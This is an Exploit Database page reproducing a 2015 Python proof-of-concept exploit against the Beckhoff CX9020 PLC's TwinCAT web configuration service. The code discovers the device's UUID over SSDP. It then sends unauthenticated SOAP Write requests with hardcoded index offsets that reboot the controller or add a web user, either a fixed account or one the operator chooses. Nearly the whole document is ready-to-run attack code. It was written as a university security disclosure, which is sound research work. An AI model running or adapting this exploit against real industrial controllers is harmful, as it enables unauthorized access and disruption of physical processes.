Beckhoff CX9020 CPU Module – Remote Code Execution

• Exploit Database
• 14 阅读

• 作者： Photubias
  日期： 2015-10-22
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/38514/

• #!/usr/bin/env python
  '''
  # Exploit Title: Beckhoff CX9020 CPU Module Web Exploit (RCE)
  # Date: 2015-10-22
  # Exploit Author: Photubias - tijl[dot]deneut[at]howest[dot]be, based on work by Frank Lycops (frank.lycops@thesecurityfactory.be)
  # Vendor Homepage: https://www.beckhoff.com/english.asp?embedded_pc/cx9020.htm
  # Version: TwinCat UpnpWebsite < 3.1.4018.13, fixed with ftp://ftp.beckhoff.com/software/embPC-Control/CX90xx/CX9020/CE/TC3/CX9020_CB3011_WEC7_HPS_v602i_TC31_B4018.13.zip
  # Tested on: Python runs on any Windows or Linux
  # CVE : CVE-2015-4051 (similar to this CVE, but different service IPC Diagnostics Authentication <> Web Authentication)
  
  Copyright 2015 Photubias(c)
  
  Written for Howest(c) University College, Ghent University, XiaK
  
  This program is free software: you can redistribute it and/or modify
  it under the terms of the GNU General Public License as published by
  the Free Software Foundation, either version 3 of the License, or
  (at your option) any later version.
  
  This program is distributed in the hope that it will be useful,
  but WITHOUT ANY WARRANTY; without even the implied warranty of
  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.See the
  GNU General Public License for more details.
  
  You should have received a copy of the GNU General Public License
  along with this program.If not, see <http://www.gnu.org/licenses/>.
  
  File name CX9020-WebControl.py
  written by tijl[dot]deneut[at]howest[dot]be
  This POC allows to reboot any CX9020 PLC and add random (Web) users to be configured.
   -> Test by going to http://<IP>/config (redirects to http://<NAME>:5120/UpnpWebsite/index.htm)
   -> Default credentials are guest/1 and webguest/1, but this exploit works without credentials
   -> Verify Website version by logging into http://<IP>/config and clicking "TwinCAT"
  '''
  import sys, httplib, socket, re, base64
  
  ## Defining Functions first:
  def rebootMachine(UNS, IP, IO):
  ## This is the SOAP Message:
  SoapMessage = "<?xml version=\"1.0\" encoding=\"utf-8\"?><s:Envelope s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\" xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\">"
  SoapMessage += "<s:Body><u:Write xmlns:u=\"urn:beckhoff.com:service:cxconfig:1\"><netId></netId><nPort>0</nPort><indexGroup>0</indexGroup>"
  SoapMessage += "<IndexOffset>-" + IO + "</IndexOffset>"
  SoapMessage += "<pData>AQAAAAAA</pData></u:Write></s:Body></s:Envelope>"
  
  ## Construct and send the HTTP POST header
  rebootwebservice = httplib.HTTP(IP + ":5120")
  rebootwebservice.putrequest("POST", "/upnpisapi?uuid:" + UNS + "+urn:beckhoff.com:serviceId:cxconfig")
  rebootwebservice.putheader("Host", IP + ":5120")
  rebootwebservice.putheader("User-Agent", "Tijls Python Script")
  rebootwebservice.putheader("Content-type", "text/xml; charset=utf-8")
  rebootwebservice.putheader("Content-length", "%d" % len(SoapMessage))
  rebootwebservice.putheader("SOAPAction", "urn:beckhoff.com:service:cxconfig:1#Write")
  rebootwebservice.endheaders()
  rebootwebservice.send(SoapMessage)
  
  ## Get the response
  statuscode, statusmessage, header = rebootwebservice.getreply()
  if statuscode == 200:
  print "Exploit worked, device should be rebooting!"
  return 1
  else:
  print "Something went wrong, the used index is probably wrong? This is the response code:"
  ## Printing HTTP Response code
  res = rebootwebservice.getfile().read()
  print res
  return 0
  
  #print "Response: ", statuscode, statusmessage
  #print "headers: ", header
  
  def addUser(UNS, IP, PDATA, IO):
  ## This is the SOAP Message:
  SoapMessage = '<?xml version="1.0" encoding="utf-8"?><s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">'
  SoapMessage += '<s:Body><u:Write xmlns:u="urn:beckhoff.com:service:cxconfig:1"><netId></netId><nPort>0</nPort><indexGroup>0</indexGroup>'
  SoapMessage += '<IndexOffset>-' + IO + '</IndexOffset>'
  SoapMessage += '<pData>' + PDATA + '</pData></u:Write></s:Body></s:Envelope>'
  
  ## Construct and send the HTTP POST header
  rebootwebservice = httplib.HTTP(IP + ":5120")
  rebootwebservice.putrequest("POST", "/upnpisapi?uuid:" + UNS + "+urn:beckhoff.com:serviceId:cxconfig")
  rebootwebservice.putheader("Host", IP + ":5120")
  rebootwebservice.putheader("User-Agent", "Tijls Python Script")
  rebootwebservice.putheader("Content-type", "text/xml; charset=utf-8")
  rebootwebservice.putheader("Content-length", "%d" % len(SoapMessage))
  rebootwebservice.putheader("SOAPAction", "urn:beckhoff.com:service:cxconfig:1#Write")
  rebootwebservice.endheaders()
  rebootwebservice.send(SoapMessage)
  
  ## Get the response
  statuscode, statusmessage, header = rebootwebservice.getreply()
  if statuscode == 200:
  print "Exploit worked, user is added!"
  return 1
  else:
  print "Something went wrong, the used index is probably wrong? This is the response code:"
  ## Printing HTTP Response code
  res = rebootwebservice.getfile().read()
  print res
  return 0
  
  #print "Response: ", statuscode, statusmessage
  #print "headers: ", header
  
  def addOwnUser(UNS, IP, IO):
  ## This will prompt for username and password and then create the custom pData string
  USERNAME = raw_input("Please enter the username: ")
  PASSWORD = raw_input("Please enter the password: ")
  CONCATENATED = USERNAME + PASSWORD
  
  # Creating the Full String to encode
  FULLSTRING = chr(16+len(CONCATENATED))
  FULLSTRING += chr(0)+chr(0)+chr(0)
  FULLSTRING += chr(len(USERNAME))
  FULLSTRING += chr(0)+chr(0)+chr(0)+chr(0)+chr(0)+chr(0)+chr(0)
  FULLSTRING += chr(len(PASSWORD))
  FULLSTRING += chr(0)+chr(0)+chr(0)
  FULLSTRING += CONCATENATED
  
  # Encode a first time, but we don't want any '=' signs in the encoded version
  PDATA = base64.b64encode(FULLSTRING)
  if PDATA.endswith('='):
  FULLSTRING += chr(0)
  PDATA = base64.b64encode(FULLSTRING)
  if PDATA.endswith('='):
  FULLSTRING += chr(0)
  PDATA = base64.b64encode(FULLSTRING)
  
  # Now we have the correct PDATA string
  print 'We will use this string: '+PDATA
  return addUser(UNS, IP, PDATA, IO)
  
  def is_ipv4(ip):
  	match = re.match("^(\d{0,3})\.(\d{0,3})\.(\d{0,3})\.(\d{0,3})$", ip)
  	if not match:
  		return False
  	quad = []
  	for number in match.groups():
  		quad.append(int(number))
  	if quad[0] < 1:
  		return False
  	for number in quad:
  		if number > 255 or number < 0:
  			return False
  	return True
  
  ###### START PROGRAM #######
  if not len(sys.argv) == 2:
  IP = raw_input("Please enter the IPv4 address of the Beckhoff PLC: ")
  else:
  IP = sys.argv[1]
  
  if not is_ipv4(IP):
  	print "Please go read RFC 791 and then use a legitimate IPv4 address."
  	sys.exit()
  
  ## Initialize variables
  UNS = ''
  ActiveRebootIndOff = '1329528576' # Active means active Engineering Licenses (when PLC has been programmed less than a week ago)
  InactiveRebootIndOff = '1330577152'
  ActiveUserIndOff = '1339031296'
  InactiveUserIndOff = '1340079872'
  
  print 'Finding the unique UNS (UUID) of the target system (' + IP + '), hold on...\n'
  
  DISCOVERY_MSG = ('M-SEARCH * HTTP/1.1\r\n' +
   'HOST: 239.255.255.250:1900\r\n' +
   'MAN: "ssdp:discover"\r\n' +
   'MX: 3\r\n' +
   'ST: upnp:rootdevice\r\n' +
   '\r\n')
  
  SOCK = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  SOCK.settimeout(10)
  SOCK.sendto(DISCOVERY_MSG, (IP, 1900))
  try:
  RESPONSE = SOCK.recv(1000).split('\r\n')
  except:
  print 'Something went wrong, is the system online?\nTry opening http://' + IP + ':5120/config\n'
  raw_input('Press Enter to continue...')
  sys.exit(0)
  
  for LINE in RESPONSE:
  if ':uuid' in LINE:
  UNS = LINE[9:45]
  print 'Got it: ' + LINE[9:45] + '\n'
  SOCK.close()
  
  if not UNS:
  print '\n\nProblem finding UNS, this is full SSDP response: \n'
  for LINE in RESPONSE: print LINE
  input('Press Enter to continue...')
  sys.exit(0)
  else:
  print 'Let\'s go, choose your option:'
  print '1 = reboot PLC'
  print '2 = add user tijl with password xiak'
  print '3 = add user from your choosing'
  usr_input = raw_input('Select a number: ')
  if usr_input == '1':
  if not rebootMachine(UNS, IP, InactiveRebootIndOff):
  rebootMachine(UNS, IP, ActiveRebootIndOff)
  raw_input('Press Enter to continue...')
  elif usr_input == '2':
  if not addUser(UNS, IP, 'GAAAAAQAAAAAAAAABAAAAHRpamx4aWFr', InactiveUserIndOff):
  addUser(UNS, IP, 'GAAAAAQAAAAAAAAABAAAAHRpamx4aWFr', ActiveUserIndOff)
  raw_input('Press Enter to continue...')
  elif usr_input == '3':
  if not addOwnUser(UNS, IP, InactiveUserIndOff):
  addOwnUser(UNS, IP, ActiveUserIndOff)
  raw_input('Press Enter to continue...')
  else:
  print 'Please choose a sensible input next time, exiting.'
  input('Press Enter to continue...')
  sys.exit()